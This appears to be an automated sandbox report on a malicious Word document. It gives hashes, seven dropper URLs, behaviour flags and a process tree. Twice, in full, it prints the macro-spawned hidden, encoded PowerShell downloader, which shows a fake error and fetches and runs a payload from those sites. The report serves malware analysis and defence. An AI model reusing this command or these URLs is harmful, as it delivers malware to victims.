Analysis

  • max time kernel
    71s
  • max time network
    37s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    20-01-2021 11:04

General

  • Target

    Mes 53060.doc

  • Size

    162KB

  • MD5

    5d6e34e6e9d3025d3fbf43075c149965

  • SHA1

    3f38dc61f0d24411753e55f5abb8a3eb3bcd9a6a

  • SHA256

    9811dc518086c80be81829db246a7e7dce042b6630d27f2f8361608e655d7aa9

  • SHA512

    97d4c04ff6a82ca7462caf411e6bdb408d7098884315da2f130a852c16c25a783af1f2a90a10d3689fedcbb576a9a4ae53151eda0e1d581f7eec762a907ab4d9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://avz-pr.com/wp-includes/hJ/

exe.dropper

https://ultimatesoftwarenet.com/wp-content/upB/

exe.dropper

https://sundargarhmirror.com/wp-content/sRu7KK/

exe.dropper

https://cawada.com/wp-content/7SSUz0/

exe.dropper

https://hilmagym.com/alden-s-ylxyau/Rljs3s/

exe.dropper

https://yurdumaku.com/blogs/zQAwwA/

exe.dropper

http://www.surveycanada.xyz/wp-content/0sDDTy/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Mes 53060.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1096
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD cwB2ACAAKAAnAEwAJwArACcARwA3AHYAJwApACAAIAAoAFsAdAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiAC0AZgAnAHMAeQAnACwAJwBPAC4AZABpACcALAAnAHMAVABlAE0AJwAsACcAcgBFAEMAVABPAFIAeQAnACwAJwAuAEkAJwApACAAIAApACAAOwAgACAAcwBlAFQAIABKADcARgAzADgATgAgACAAKAAgACAAWwBUAHkAcABlAF0AKAAiAHsAMwB9AHsANAB9AHsANQB9AHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAEYAIAAnAEUAJwAsACcAaQBjAGUAcABvAEkAbgBUAE0AQQBOAEEARwBFAFIAJwAsACcAUgBWACcALAAnAFMAeQAnACwAJwBzAHQAZQBNAC4ATgAnACwAJwBFAHQALgBzACcAKQAgACAAKQAgACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQBuAHQAJwArACcAbAAnACkAKwAoACcAeQAnACsAJwBDAG8AJwApACsAKAAnAG4AdABpAG4AdQAnACsAJwBlACcAKQApADsAJABVAGkAegBuADMAZgBoAD0AJABBADcAXwBEACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABTADUANQBKADsAJABLADEANQBKAD0AKAAnAFQAJwArACgAJwA2ADgAJwArACcAVwAnACkAKQA7ACAAKAAgAGcAZQB0AC0ASQB0AEUAbQAgACgAJwBWAGEAcgBpACcAKwAnAEEAYgBsACcAKwAnAEUAJwArACcAOgBsAGcANwBWACcAKQApAC4AVgBBAGwAdQBlADoAOgAiAEMAcgBgAEUAQQBgAFQARQBEAEkAUgBFAGAAQwB0AG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBnAEcAVAAnACsAJwBCAHMAXwAnACkAKwAnAGMAOAAnACsAKAAnAG4AMgBnACcAKwAnAEcAJwApACsAKAAnAFQAVgBuACcAKwAnADkAcwBnAGQAJwArACcANQAnACsAJwBnAEcAJwApACsAJwBUACcAKQAtAHIARQBQAEwAYQBjAGUAIAAoAFsAYwBoAEEAUgBdADEAMAAzACsAWwBjAGgAQQBSAF0ANwAxACsAWwBjAGgAQQBSAF0AOAA0ACkALABbAGMAaABBAFIAXQA5ADIAKQApADsAJABUADkAXwBLAD0AKAAnAE8ANwAnACsAJwAzAFQAJwApADsAIAAgACgAIAAgAEcAaQAgAHYAYQByAEkAQQBiAGwARQA6AGoANwBmADMAOABuACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAYwB1AHIAaQBUAHkAYABwAHIAYABPAFQAYABPAGAAQwBPAEwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAEcAOAA1AFEAPQAoACcARQAnACsAKAAnADIAMQAnACsAJwBWACcAKQApADsAJABUAHMAMQBwAHcAeQBxACAAPQAgACgAJwBEACcAKwAoACcANgAnACsAJwA4AFMAJwApACkAOwAkAFIAOQA1AFQAPQAoACcAWgAnACsAKAAnADYAJwArACcAMwBVACcAKQApADsAJABYAHoAbwA4AHQAMQA2AD0AJABIAE8ATQBFACsAKAAoACgAJwB3ACcAKwAnADQAZwAnACkAKwAoACcAQgAnACsAJwBzAF8AYwA4ACcAKQArACcAbgAyACcAKwAoACcAdwA0AGcAJwArACcAVgAnACkAKwAnAG4AOQAnACsAKAAnAHMAZwBkACcAKwAnADUAdwA0ACcAKQArACcAZwAnACkALQByAEUAUABMAEEAYwBFACAAKABbAEMAaABBAHIAXQAxADEAOQArAFsAQwBoAEEAcgBdADUAMgArAFsAQwBoAEEAcgBdADEAMAAzACkALABbAEMAaABBAHIAXQA5ADIAKQArACQAVABzADEAcAB3AHkAcQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQARgA4ADcASgA9ACgAKAAnAEQAMgAnACsAJwA4ACcAKQArACcATAAnACkAOwAkAFQANgBwADMAdwB3AGUAPQAoACgAJwBdAGUAMQByACcAKwAnAFsAJwArACcAUwA6AC8ALwAnACsAJwBhACcAKQArACgAJwB2AHoALQBwAHIAJwArACcALgBjAG8AbQAnACsAJwAvAHcAJwArACcAcAAtACcAKQArACgAJwBpAG4AJwArACcAYwAnACkAKwAnAGwAdQAnACsAJwBkAGUAJwArACgAJwBzAC8AJwArACcAaABKAC8AQAAnACkAKwAnAF0AJwArACcAZQAxACcAKwAnAHIAJwArACgAJwBbAFMAcwA6ACcAKwAnAC8ALwAnACsAJwB1AGwAdABpACcAKQArACgAJwBtAGEAJwArACcAdABlACcAKQArACgAJwBzAG8AZgB0ACcAKwAnAHcAYQAnACsAJwByAGUAbgBlACcAKwAnAHQALgBjAG8AbQAvACcAKwAnAHcAcAAtACcAKwAnAGMAbwAnACsAJwBuAHQAJwArACcAZQBuAHQALwAnACsAJwB1AHAAQgAvACcAKQArACgAJwBAAF0AZQAxACcAKwAnAHIAWwBTAHMAOgAvACcAKwAnAC8AcwB1ACcAKQArACcAbgBkACcAKwAnAGEAcgAnACsAJwBnAGEAJwArACgAJwByAGgAbQBpAHIAJwArACcAcgBvAHIAJwArACcALgAnACkAKwAnAGMAJwArACcAbwAnACsAKAAnAG0AJwArACcALwB3ACcAKQArACcAcAAtACcAKwAoACcAYwBvACcAKwAnAG4AdABlACcAKwAnAG4AdAAvAHMAJwApACsAJwBSACcAKwAoACcAdQAnACsAJwA3AEsAJwApACsAKAAnAEsALwAnACsAJwBAAF0AZQAxACcAKwAnAHIAWwBTAHMAJwArACcAOgAnACkAKwAoACcALwAvAGMAJwArACcAYQAnACsAJwB3AGEAZABhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBjAG8AbgAnACsAJwB0AGUAJwApACsAKAAnAG4AdAAvADcAJwArACcAUwBTAFUAegAnACsAJwAwAC8AQABdAGUAJwArACcAMQAnACkAKwAnAHIAJwArACgAJwBbAFMAcwAnACsAJwA6ACcAKQArACcALwAnACsAKAAnAC8AJwArACcAaABpACcAKQArACgAJwBsAG0AYQBnACcAKwAnAHkAbQAuAGMAbwAnACsAJwBtACcAKwAnAC8AYQBsACcAKQArACgAJwBkAGUAbgAtAHMALQB5AGwAeAB5ACcAKwAnAGEAdQAvAFIAJwArACcAbABqACcAKQArACgAJwBzADMAcwAvAEAAXQAnACsAJwBlACcAKwAnADEAcgBbACcAKQArACgAJwBTAHMAJwArACcAOgAnACkAKwAoACcALwAvACcAKwAnAHkAdQByACcAKQArACgAJwBkAHUAbQBhAGsAJwArACcAdQAnACsAJwAuAGMAJwApACsAKAAnAG8AbQAvAGIAbABvACcAKwAnAGcAJwArACcAcwAvAHoAUQBBAHcAJwApACsAJwB3ACcAKwAoACcAQQAnACsAJwAvAEAAJwApACsAKAAnAF0AJwArACcAZQAxACcAKQArACgAJwByACcAKwAnAFsAUwAnACkAKwAnADoALwAnACsAKAAnAC8AJwArACcAdwB3AHcAJwApACsAKAAnAC4AcwB1ACcAKwAnAHIAJwApACsAKAAnAHYAJwArACcAZQB5AGMAYQBuACcAKQArACcAYQAnACsAKAAnAGQAYQAuAHgAeQB6ACcAKwAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGMAbwBuACcAKwAnAHQAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwB0AC8AJwApACsAJwAwAHMAJwArACcARAAnACsAKAAnAEQAVAB5ACcAKwAnAC8AJwApACkALgAiAHIAZQBwAEwAYQBgAEMARQAiACgAKAAoACcAXQAnACsAJwBlADEAJwApACsAKAAnAHIAJwArACcAWwBTACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAUwA4ADkAQQAgACsAIAAkAFUAaQB6AG4AMwBmAGgAIAArACAAJABPADUAMABOACkAOwAkAEYAMgAzAEwAPQAoACcAVgAnACsAKAAnADIANgAnACsAJwBPACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABEADQAeQBnAGsAZAAzACAAaQBuACAAJABUADYAcAAzAHcAdwBlACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQAnACsAJwBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAHkAcwBUAGUATQAuAE4AZQBUAC4AdwBFAGIAQwBMAGkAZQBOAFQAKQAuACIARABvAHcATgBsAG8AYABBAGQARgBpAGAATABlACIAKAAkAEQANAB5AGcAawBkADMALAAgACQAWAB6AG8AOAB0ADEANgApADsAJABVADUANwBJAD0AKAAnAE8ANwAnACsAJwA4AE0AJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFgAegBvADgAdAAxADYAKQAuACIATABlAE4ARwBgAFQASAAiACAALQBnAGUAIAAzADQANAAxADkAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQAWAB6AG8AOAB0ADEANgAsACgAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAcgBvAGwAJwApACsAJwBfACcAKwAoACcAUgAnACsAJwB1AG4ARABMAEwAJwApACkALgAiAFQAYABvAHMAYABUAHIASQBuAGcAIgAoACkAOwAkAFUAMwA5AEcAPQAoACcAWQA1ACcAKwAnADQAUQAnACkAOwBiAHIAZQBhAGsAOwAkAFAAOAAwAEIAPQAoACcATAAyACcAKwAnADQATQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMgA2AEUAPQAoACcAQQAnACsAKAAnADUAJwArACcAMABXACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD cwB2ACAAKAAnAEwAJwArACcARwA3AHYAJwApACAAIAAoAFsAdAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiAC0AZgAnAHMAeQAnACwAJwBPAC4AZABpACcALAAnAHMAVABlAE0AJwAsACcAcgBFAEMAVABPAFIAeQAnACwAJwAuAEkAJwApACAAIAApACAAOwAgACAAcwBlAFQAIABKADcARgAzADgATgAgACAAKAAgACAAWwBUAHkAcABlAF0AKAAiAHsAMwB9AHsANAB9AHsANQB9AHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAEYAIAAnAEUAJwAsACcAaQBjAGUAcABvAEkAbgBUAE0AQQBOAEEARwBFAFIAJwAsACcAUgBWACcALAAnAFMAeQAnACwAJwBzAHQAZQBNAC4ATgAnACwAJwBFAHQALgBzACcAKQAgACAAKQAgACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQBuAHQAJwArACcAbAAnACkAKwAoACcAeQAnACsAJwBDAG8AJwApACsAKAAnAG4AdABpAG4AdQAnACsAJwBlACcAKQApADsAJABVAGkAegBuADMAZgBoAD0AJABBADcAXwBEACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABTADUANQBKADsAJABLADEANQBKAD0AKAAnAFQAJwArACgAJwA2ADgAJwArACcAVwAnACkAKQA7ACAAKAAgAGcAZQB0AC0ASQB0AEUAbQAgACgAJwBWAGEAcgBpACcAKwAnAEEAYgBsACcAKwAnAEUAJwArACcAOgBsAGcANwBWACcAKQApAC4AVgBBAGwAdQBlADoAOgAiAEMAcgBgAEUAQQBgAFQARQBEAEkAUgBFAGAAQwB0AG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBnAEcAVAAnACsAJwBCAHMAXwAnACkAKwAnAGMAOAAnACsAKAAnAG4AMgBnACcAKwAnAEcAJwApACsAKAAnAFQAVgBuACcAKwAnADkAcwBnAGQAJwArACcANQAnACsAJwBnAEcAJwApACsAJwBUACcAKQAtAHIARQBQAEwAYQBjAGUAIAAoAFsAYwBoAEEAUgBdADEAMAAzACsAWwBjAGgAQQBSAF0ANwAxACsAWwBjAGgAQQBSAF0AOAA0ACkALABbAGMAaABBAFIAXQA5ADIAKQApADsAJABUADkAXwBLAD0AKAAnAE8ANwAnACsAJwAzAFQAJwApADsAIAAgACgAIAAgAEcAaQAgAHYAYQByAEkAQQBiAGwARQA6AGoANwBmADMAOABuACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAYwB1AHIAaQBUAHkAYABwAHIAYABPAFQAYABPAGAAQwBPAEwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAEcAOAA1AFEAPQAoACcARQAnACsAKAAnADIAMQAnACsAJwBWACcAKQApADsAJABUAHMAMQBwAHcAeQBxACAAPQAgACgAJwBEACcAKwAoACcANgAnACsAJwA4AFMAJwApACkAOwAkAFIAOQA1AFQAPQAoACcAWgAnACsAKAAnADYAJwArACcAMwBVACcAKQApADsAJABYAHoAbwA4AHQAMQA2AD0AJABIAE8ATQBFACsAKAAoACgAJwB3ACcAKwAnADQAZwAnACkAKwAoACcAQgAnACsAJwBzAF8AYwA4ACcAKQArACcAbgAyACcAKwAoACcAdwA0AGcAJwArACcAVgAnACkAKwAnAG4AOQAnACsAKAAnAHMAZwBkACcAKwAnADUAdwA0ACcAKQArACcAZwAnACkALQByAEUAUABMAEEAYwBFACAAKABbAEMAaABBAHIAXQAxADEAOQArAFsAQwBoAEEAcgBdADUAMgArAFsAQwBoAEEAcgBdADEAMAAzACkALABbAEMAaABBAHIAXQA5ADIAKQArACQAVABzADEAcAB3AHkAcQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQARgA4ADcASgA9ACgAKAAnAEQAMgAnACsAJwA4ACcAKQArACcATAAnACkAOwAkAFQANgBwADMAdwB3AGUAPQAoACgAJwBdAGUAMQByACcAKwAnAFsAJwArACcAUwA6AC8ALwAnACsAJwBhACcAKQArACgAJwB2AHoALQBwAHIAJwArACcALgBjAG8AbQAnACsAJwAvAHcAJwArACcAcAAtACcAKQArACgAJwBpAG4AJwArACcAYwAnACkAKwAnAGwAdQAnACsAJwBkAGUAJwArACgAJwBzAC8AJwArACcAaABKAC8AQAAnACkAKwAnAF0AJwArACcAZQAxACcAKwAnAHIAJwArACgAJwBbAFMAcwA6ACcAKwAnAC8ALwAnACsAJwB1AGwAdABpACcAKQArACgAJwBtAGEAJwArACcAdABlACcAKQArACgAJwBzAG8AZgB0ACcAKwAnAHcAYQAnACsAJwByAGUAbgBlACcAKwAnAHQALgBjAG8AbQAvACcAKwAnAHcAcAAtACcAKwAnAGMAbwAnACsAJwBuAHQAJwArACcAZQBuAHQALwAnACsAJwB1AHAAQgAvACcAKQArACgAJwBAAF0AZQAxACcAKwAnAHIAWwBTAHMAOgAvACcAKwAnAC8AcwB1ACcAKQArACcAbgBkACcAKwAnAGEAcgAnACsAJwBnAGEAJwArACgAJwByAGgAbQBpAHIAJwArACcAcgBvAHIAJwArACcALgAnACkAKwAnAGMAJwArACcAbwAnACsAKAAnAG0AJwArACcALwB3ACcAKQArACcAcAAtACcAKwAoACcAYwBvACcAKwAnAG4AdABlACcAKwAnAG4AdAAvAHMAJwApACsAJwBSACcAKwAoACcAdQAnACsAJwA3AEsAJwApACsAKAAnAEsALwAnACsAJwBAAF0AZQAxACcAKwAnAHIAWwBTAHMAJwArACcAOgAnACkAKwAoACcALwAvAGMAJwArACcAYQAnACsAJwB3AGEAZABhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBjAG8AbgAnACsAJwB0AGUAJwApACsAKAAnAG4AdAAvADcAJwArACcAUwBTAFUAegAnACsAJwAwAC8AQABdAGUAJwArACcAMQAnACkAKwAnAHIAJwArACgAJwBbAFMAcwAnACsAJwA6ACcAKQArACcALwAnACsAKAAnAC8AJwArACcAaABpACcAKQArACgAJwBsAG0AYQBnACcAKwAnAHkAbQAuAGMAbwAnACsAJwBtACcAKwAnAC8AYQBsACcAKQArACgAJwBkAGUAbgAtAHMALQB5AGwAeAB5ACcAKwAnAGEAdQAvAFIAJwArACcAbABqACcAKQArACgAJwBzADMAcwAvAEAAXQAnACsAJwBlACcAKwAnADEAcgBbACcAKQArACgAJwBTAHMAJwArACcAOgAnACkAKwAoACcALwAvACcAKwAnAHkAdQByACcAKQArACgAJwBkAHUAbQBhAGsAJwArACcAdQAnACsAJwAuAGMAJwApACsAKAAnAG8AbQAvAGIAbABvACcAKwAnAGcAJwArACcAcwAvAHoAUQBBAHcAJwApACsAJwB3ACcAKwAoACcAQQAnACsAJwAvAEAAJwApACsAKAAnAF0AJwArACcAZQAxACcAKQArACgAJwByACcAKwAnAFsAUwAnACkAKwAnADoALwAnACsAKAAnAC8AJwArACcAdwB3AHcAJwApACsAKAAnAC4AcwB1ACcAKwAnAHIAJwApACsAKAAnAHYAJwArACcAZQB5AGMAYQBuACcAKQArACcAYQAnACsAKAAnAGQAYQAuAHgAeQB6ACcAKwAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGMAbwBuACcAKwAnAHQAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwB0AC8AJwApACsAJwAwAHMAJwArACcARAAnACsAKAAnAEQAVAB5ACcAKwAnAC8AJwApACkALgAiAHIAZQBwAEwAYQBgAEMARQAiACgAKAAoACcAXQAnACsAJwBlADEAJwApACsAKAAnAHIAJwArACcAWwBTACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAUwA4ADkAQQAgACsAIAAkAFUAaQB6AG4AMwBmAGgAIAArACAAJABPADUAMABOACkAOwAkAEYAMgAzAEwAPQAoACcAVgAnACsAKAAnADIANgAnACsAJwBPACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABEADQAeQBnAGsAZAAzACAAaQBuACAAJABUADYAcAAzAHcAdwBlACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQAnACsAJwBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAHkAcwBUAGUATQAuAE4AZQBUAC4AdwBFAGIAQwBMAGkAZQBOAFQAKQAuACIARABvAHcATgBsAG8AYABBAGQARgBpAGAATABlACIAKAAkAEQANAB5AGcAawBkADMALAAgACQAWAB6AG8AOAB0ADEANgApADsAJABVADUANwBJAD0AKAAnAE8ANwAnACsAJwA4AE0AJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFgAegBvADgAdAAxADYAKQAuACIATABlAE4ARwBgAFQASAAiACAALQBnAGUAIAAzADQANAAxADkAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQAWAB6AG8AOAB0ADEANgAsACgAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAcgBvAGwAJwApACsAJwBfACcAKwAoACcAUgAnACsAJwB1AG4ARABMAEwAJwApACkALgAiAFQAYABvAHMAYABUAHIASQBuAGcAIgAoACkAOwAkAFUAMwA5AEcAPQAoACcAWQA1ACcAKwAnADQAUQAnACkAOwBiAHIAZQBhAGsAOwAkAFAAOAAwAEIAPQAoACcATAAyACcAKwAnADQATQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMgA2AEUAPQAoACcAQQAnACsAKAAnADUAJwArACcAMABXACcAKQApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1468

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1096-2-0x0000000072761000-0x0000000072764000-memory.dmp
      Filesize

      12KB

    • memory/1096-3-0x00000000701E1000-0x00000000701E3000-memory.dmp
      Filesize

      8KB

    • memory/1096-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1376-5-0x0000000000000000-mapping.dmp
    • memory/1468-6-0x0000000000000000-mapping.dmp
    • memory/1468-7-0x000007FEFBBB1000-0x000007FEFBBB3000-memory.dmp
      Filesize

      8KB

    • memory/1468-8-0x000007FEF5330000-0x000007FEF5D1C000-memory.dmp
      Filesize

      9.9MB

    • memory/1468-9-0x0000000002490000-0x0000000002491000-memory.dmp
      Filesize

      4KB

    • memory/1468-10-0x000000001AAD0000-0x000000001AAD1000-memory.dmp
      Filesize

      4KB

    • memory/1468-11-0x000000001B380000-0x000000001B381000-memory.dmp
      Filesize

      4KB

    • memory/1468-12-0x000000001A890000-0x000000001A892000-memory.dmp
      Filesize

      8KB

    • memory/1468-13-0x000000001A894000-0x000000001A896000-memory.dmp
      Filesize

      8KB

    • memory/1468-14-0x00000000023F0000-0x00000000023F1000-memory.dmp
      Filesize

      4KB

    • memory/1468-15-0x000000001C360000-0x000000001C361000-memory.dmp
      Filesize

      4KB

    • memory/1468-16-0x000000001B940000-0x000000001B941000-memory.dmp
      Filesize

      4KB